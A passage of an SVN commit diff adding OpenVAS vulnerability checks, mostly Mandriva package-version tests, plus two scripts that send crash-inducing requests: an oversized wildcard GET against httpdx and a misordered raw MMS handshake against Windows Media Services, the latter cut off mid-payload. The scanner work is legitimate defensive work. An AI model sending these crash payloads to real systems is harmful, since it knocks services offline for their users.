+ requests and can be exploited to cause a denial of service via a specially
+ crafted packet.
+
+ Impact:
+ Successful exploitation will allow attackers to cause the server to crash,
+ denying service to legitimate users.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ httpdx version 1.5.4
+
+ Fix: No solution or patch is available as on 27th July, 2012. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://sourceforge.net/projects/httpdx/
+
+ References:
+ http://www.securityfocus.com/bid/54629
+ http://www.exploit-db.com/exploits/19988 ";
+
+ script_description(desc);
+ script_summary("Determine if httpdx is prone to a denial of service");
+ script_category(ACT_DENIAL);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Denial of Service");
+ script_dependencies("gb_httpdx_server_detect.nasl");
+ script_require_keys("httpdx/installed");
+ script_require_ports("Services/www",80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("host_details.inc");
+
+## Variable Initialization
+port = 0;
+req = "";
+res = "";
+crash = "";
+
+## Get HTTP Port
+port = get_app_port(cpe:CPE, nvt:SCRIPT_OID);
+if(! port){
+ exit(0);
+}
+
+## Construct attack Request
+crash = crap(data: "*", length: 2450) + crap(data: "A", length: 540);
+req = string("GET /", crash, " HTTP/1.0\r\n",
+ "Host: ", get_host_name(), "\r\n\r\n");
+
+## Send attack request
+res = http_send_recv(port:port, data:req);
+
+## Confirm httpdx is dead
+if(http_is_dead(port:port)){
+ security_warning(port);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_httpdx_wildcards_remote_dos_vuln.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_112.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_112.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_112.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Mandriva Update for perl-DBD-Pg MDVSA-2012:112 (perl-DBD-Pg)
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ A vulnerability has been discovered and corrected in perl-DBD-Pg:
+
+ Two format string flaws were found in the way perl-DBD-Pg. A
+ rogue server could provide a specially-crafted database warning
+ or specially-crafted DBD statement, which once processed by the
+ perl-DBD-Pg interface would lead to perl-DBD-Pg based process crash
+ (CVE-2012-1151).
+
+ The updated packages have been patched to correct this issue.
+
+ Affected Software/OS:
+ perl-DBD-Pg on Mandriva Linux 2011.0,
+ Mandriva Enterprise Server 5.2
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:112 ";
+
+if(description)
+{
+ script_id(831706);
+ script_version("$Revision$");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"creation_date", value:"2012-07-30 11:23:00 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-1151");
+ script_tag(name:"cvss_base", value:"10.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_xref(name: "MDVSA", value: "2012:112");
+ script_name("Mandriva Update for perl-DBD-Pg MDVSA-2012:112 (perl-DBD-Pg)");
+
+ script_description(desc);
+ script_summary("Check for the Version of perl-DBD-Pg");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Mandrake Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "MNDK_2011.0")
+{
+
+ if ((res = isrpmvuln(pkg:"perl-DBD-Pg", rpm:"perl-DBD-Pg~2.18.1~1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "MNDK_mes5.2")
+{
+
+ if ((res = isrpmvuln(pkg:"perl-DBD-Pg", rpm:"perl-DBD-Pg~2.10.3~1.1mdvmes5.2", rls:"MNDK_mes5.2")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_112.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_113.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_113.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_113.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Mandriva Update for arpwatch MDVSA-2012:113 (arpwatch)
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ A vulnerability has been discovered and corrected in arpwatch:
+
+ arpwatch 2.1a15, as used by Red Hat, Debian, Fedora, and possibly
+ others, does not properly drop supplementary groups, which might allow
+ attackers to gain root privileges by leveraging other vulnerabilities
+ in the daemon (CVE-2012-2653).
+
+ The updated packages have been patched to correct this issue.
+
+ Affected Software/OS:
+ arpwatch on Mandriva Linux 2011.0
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:113 ";
+
+if(description)
+{
+ script_id(831705);
+ script_version("$Revision$");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"creation_date", value:"2012-07-30 11:22:58 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-2653");
+ script_tag(name:"cvss_base", value:"10.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_xref(name: "MDVSA", value: "2012:113");
+ script_name("Mandriva Update for arpwatch MDVSA-2012:113 (arpwatch)");
+
+ script_description(desc);
+ script_summary("Check for the Version of arpwatch");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Mandrake Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:mandriva:linux", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "MNDK_2011.0")
+{
+
+ if ((res = isrpmvuln(pkg:"arpwatch", rpm:"arpwatch~2.1a15~9.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_113.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_115.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_115.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_115.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,132 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Mandriva Update for dhcp MDVSA-2012:115 (dhcp)
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ Multiple vulnerabilities has been discovered and corrected in ISC DHCP:
+
+ An unexpected client identifier parameter can cause the ISC DHCP
+ daemon to segmentation fault when running in DHCPv6 mode, resulting
+ in a denial of service to further client requests. In order to exploit
+ this condition, an attacker must be able to send requests to the DHCP
+ server (CVE-2012-3570)
+
+ Two memory leaks have been found and fixed in ISC DHCP. Both are
+ reproducible when running in DHCPv6 mode (with the -6 command-line
+ argument.) The first leak is confirmed to only affect servers
+ operating in DHCPv6 mode, but based on initial code analysis the
+ second may theoretically affect DHCPv4 servers (though this has not
+ been demonstrated.) (CVE-2012-3954).
+
+ The updated packages have been upgraded to the latest version
+ (4.2.4-P1) which is not affected by these issues.
+
+ Affected Software/OS:
+ dhcp on Mandriva Linux 2011.0
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:115 ";
+
+if(description)
+{
+ script_id(831703);
+ script_version("$Revision$");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"creation_date", value:"2012-07-30 11:22:50 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-3570", "CVE-2012-3571", "CVE-2012-3954");
+ script_tag(name:"cvss_base", value:"6.1");
+ script_tag(name:"cvss_base_vector", value:"AV:A/AC:L/Au:N/C:N/I:N/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "MDVSA", value: "2012:115");
+ script_name("Mandriva Update for dhcp MDVSA-2012:115 (dhcp)");
+
+ script_description(desc);
+ script_summary("Check for the Version of dhcp");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Mandrake Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:mandriva:linux", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "MNDK_2011.0")
+{
+
+ if ((res = isrpmvuln(pkg:"dhcp-client", rpm:"dhcp-client~4.2.4~0.P1.1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"dhcp-common", rpm:"dhcp-common~4.2.4~0.P1.1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"dhcp-devel", rpm:"dhcp-devel~4.2.4~0.P1.1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"dhcp-doc", rpm:"dhcp-doc~4.2.4~0.P1.1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"dhcp-relay", rpm:"dhcp-relay~4.2.4~0.P1.1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"dhcp-server", rpm:"dhcp-server~4.2.4~0.P1.1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_115.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_117.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_117.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_117.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,108 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Mandriva Update for python-pycrypto MDVSA-2012:117 (python-pycrypto)
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ A vulnerability has been discovered and corrected in python-pycrypto:
+
+ PyCrypto before 2.6 does not produce appropriate prime numbers when
+ using an ElGamal scheme to generate a key, which reduces the signature
+ space or public key space and makes it easier for attackers to conduct
+ brute force attacks to obtain the private key (CVE-2012-2417).
+
+ The updated packages have been patched to correct this issue.
+
+ Affected Software/OS:
+ python-pycrypto on Mandriva Linux 2011.0,
+ Mandriva Enterprise Server 5.2
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:117 ";
+
+if(description)
+{
+ script_id(831704);
+ script_version("$Revision$");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"creation_date", value:"2012-07-30 11:22:56 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-2417");
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_xref(name: "MDVSA", value: "2012:117");
+ script_name("Mandriva Update for python-pycrypto MDVSA-2012:117 (python-pycrypto)");
+
+ script_description(desc);
+ script_summary("Check for the Version of python-pycrypto");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Mandrake Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "MNDK_2011.0")
+{
+
+ if ((res = isrpmvuln(pkg:"python-pycrypto", rpm:"python-pycrypto~2.3~3.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "MNDK_mes5.2")
+{
+
+ if ((res = isrpmvuln(pkg:"pycrypto", rpm:"pycrypto~2.0.1~3.3mdvmes5.2", rls:"MNDK_mes5.2")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_117.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_119.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_119.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_119.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,144 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Mandriva Update for bind MDVSA-2012:119 (bind)
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ A vulnerability was discovered and corrected in bind:
+
+ High numbers of queries with DNSSEC validation enabled can cause an
+ assertion failure in named, caused by using a bad cache data structure
+ before it has been initialized (CVE-2012-3817).
+
+ The updated packages have been upgraded to bind 9.7.6-P2 and 9.8.3-P2
+ which is not vulnerable to this issue.
+
+ Affected Software/OS:
+ bind on Mandriva Linux 2011.0,
+ Mandriva Enterprise Server 5.2
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:119 ";
+
+if(description)
+{
+ script_id(831707);
+ script_version("$Revision$");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"creation_date", value:"2012-07-30 11:23:01 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-3817");
+ script_tag(name:"cvss_base", value:"7.8");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "MDVSA", value: "2012:119");
+ script_name("Mandriva Update for bind MDVSA-2012:119 (bind)");
+
+ script_description(desc);
+ script_summary("Check for the Version of bind");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Mandrake Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "MNDK_2011.0")
+{
+
+ if ((res = isrpmvuln(pkg:"bind", rpm:"bind~9.8.3~0.0.P2.0.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"bind-devel", rpm:"bind-devel~9.8.3~0.0.P2.0.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"bind-doc", rpm:"bind-doc~9.8.3~0.0.P2.0.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"bind-utils", rpm:"bind-utils~9.8.3~0.0.P2.0.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "MNDK_mes5.2")
+{
+
+ if ((res = isrpmvuln(pkg:"bind", rpm:"bind~9.7.6~0.0.P2.0.1mdvmes5.2", rls:"MNDK_mes5.2")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"bind-devel", rpm:"bind-devel~9.7.6~0.0.P2.0.1mdvmes5.2", rls:"MNDK_mes5.2")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"bind-doc", rpm:"bind-doc~9.7.6~0.0.P2.0.1mdvmes5.2", rls:"MNDK_mes5.2")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"bind-utils", rpm:"bind-utils~9.7.6~0.0.P2.0.1mdvmes5.2", rls:"MNDK_mes5.2")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_119.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_ms_win_media_service_handshake_seq_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_win_media_service_handshake_seq_dos_vuln.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_ms_win_media_service_handshake_seq_dos_vuln.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,249 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Microsoft Windows Media Service Handshake Sequence DoS Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802888);
+ script_version("$Revision$");
+ script_cve_id("CVE-2000-0211");
+ script_bugtraq_id(1000);
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 13:22:23 +0530 (Mon, 30 Jul 2012)");
+ script_name("Microsoft Windows Media Service Handshake Sequence DoS Vulnerability");
+ desc = "
+ Overview: This host is running Microsoft Windows Media Service and is prone
+ to denial of service vulnerability.
+
+ Vulnerability Insight:
+ The handshake sequence between a Windows Media server and a Windows Media
+ Player occurs in a particular order. If a series of client handshake packets
+ are sent in a particular misordered sequence, with certain timing
+ constraints, the server attempts to use a resource before it has been
+ initialized causing the Windows Media Unicast Service to crash.
+
+ Impact:
+ Successful exploitation could allow remote attackers to cause denial of
+ service conditions.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Microsoft Windows 2000
+ Microsoft Windows NT 4.0
+ Windows Media Services 4.0 and 4.1
+
+ Fix:
+ Run Windows Update and update the listed hotfixes or download and
+ update mentioned hotfixes in the advisory from the below link,
+ http://technet.microsoft.com/en-us/security/bulletin/ms00-013
+
+ References:
+ http://xforce.iss.net/xforce/xfdb/4034
+ http://www.exploit-db.com/exploits/19759
+ http://technet.microsoft.com/en-us/security/bulletin/fq00-013
+ http://support.microsoft.com/default.aspx?scid=kb;[LN];253943
+ http://technet.microsoft.com/en-us/security/bulletin/ms00-013 ";
+
+ script_description(desc);
+ script_summary("Check if Windows Media Services is vulnerable to DoS");
+ script_category(ACT_DENIAL);
+ script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
+ script_family("Windows : Microsoft Bulletins");
+ script_require_ports(1755);
+ exit(0);
+ }
+
+
+## Variable Initialization
+soc1 = 0;
+soc2 = 0;
+mss_req1 = "";
+mss_req2 = "";
+mss_req3 = "";
+mss_req4 = "";
+mss_req5 = "";
+mss_req6 = "";
+mss_req7 = "";
+mss_res = "";
+
+## Media Service Port
+port = 1755;
+
+## Check Port State
+if(!get_port_state(port)){
+ exit(0);
+}
+
+## Open the socket
+soc1 = open_sock_tcp(port);
+if(!soc1){
+ exit(0);
+}
+
+## Construct Microsoft Media Service connection request
+mss_req1 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, ## Command Signature
+ 0xa0, 0x00, 0x00, 0x00, ## Command Length
+ 0x4d, 0x4d, 0x53, 0x20, ## Protocol Type : MMS (Microsoft Media Server)
+ 0x14, 0x00, 0x00, 0x00, ## Length until end
+ 0x00, 0x00, 0x00, 0x00, ## Sequence number
+ 0xf8, 0x53, 0xe3, 0xa5, 0x9b, 0xc4, 0x00, 0x40, ## Time Stamp
+ 0x12, 0x00, 0x00, 0x00, ## Length until end
+ 0x01, 0x00, ## Cmd : Connect Info (0x0001)
+ 0x03, 0x00, ## Cmd Direction : to Server (0x0003)
+ 0xf0, 0xf0, 0xf0, 0xf0, ## Prefix 1
+ 0x0b, 0x00, 0x04, 0x00, ## Prefix 2
+ 0x1c, 0x00, 0x03, 0x00, 0x4e, 0x00, 0x53, 0x00, 0x50, ## Player Info
+ 0x00, 0x6c, 0x00, 0x61, 0x00, 0x79, 0x00, 0x65, 0x00,
+ 0x72, 0x00, 0x2f, 0x00, 0x34, 0x00, 0x2e, 0x00, 0x31,
+ 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x33, 0x00,
+ 0x38, 0x00, 0x35, 0x00, 0x37, 0x00, 0x3b, 0x00, 0x20,
+ 0x00, 0x7b, 0x00, 0x30, 0x00, 0x32, 0x00, 0x64, 0x00,
+ 0x30, 0x00, 0x63, 0x00, 0x32, 0x00, 0x63, 0x00, 0x30,
+ 0x00, 0x2d, 0x00, 0x62, 0x00, 0x35, 0x00, 0x30, 0x00,
+ 0x37, 0x00, 0x2d, 0x00, 0x31, 0x00, 0x31, 0x00, 0x64,
+ 0x00, 0x32, 0x00, 0x2d, 0x00, 0x39, 0x00, 0x61, 0x00,
+ 0x61, 0x00, 0x38, 0x00, 0x2d, 0x00, 0x62, 0x00, 0x37,
+ 0x00, 0x30, 0x00, 0x66, 0x00, 0x33, 0x00, 0x30, 0x00,
+ 0x34, 0x00, 0x34, 0x00, 0x61, 0x00, 0x65, 0x00, 0x37,
+ 0x00, 0x65, 0x00, 0x7d, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00);
+
+send(socket:soc1 , data: mss_req1);
+mms_res = recv(socket:soc1, length:512);
+
+## Confirm if its Microsoft Media service
+if(!mms_res || "MMS" >!< mms_res)
+{
+ close(soc1);
+ exit(0);
+}
+
+## Microsoft Media Service Transer Request to Server
+## Construct Misordered Handshake Sequences
+mss_req2 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x20,
+ 0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x04, 0x00,
+ 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x5e, 0xba, 0x49,
+ 0x0c, 0x02, 0x2b, 0x01, 0x40, 0x02, 0x00, 0x00, 0x00,
+ 0x18, 0x00, 0x03, 0x00, 0xf1, 0xf0, 0xf0, 0xf0, 0x0b,
+ 0x00, 0x04, 0x00);
+
+mss_req3 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x60,
+ 0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x0c, 0x00,
+ 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x83, 0xc0, 0xca,
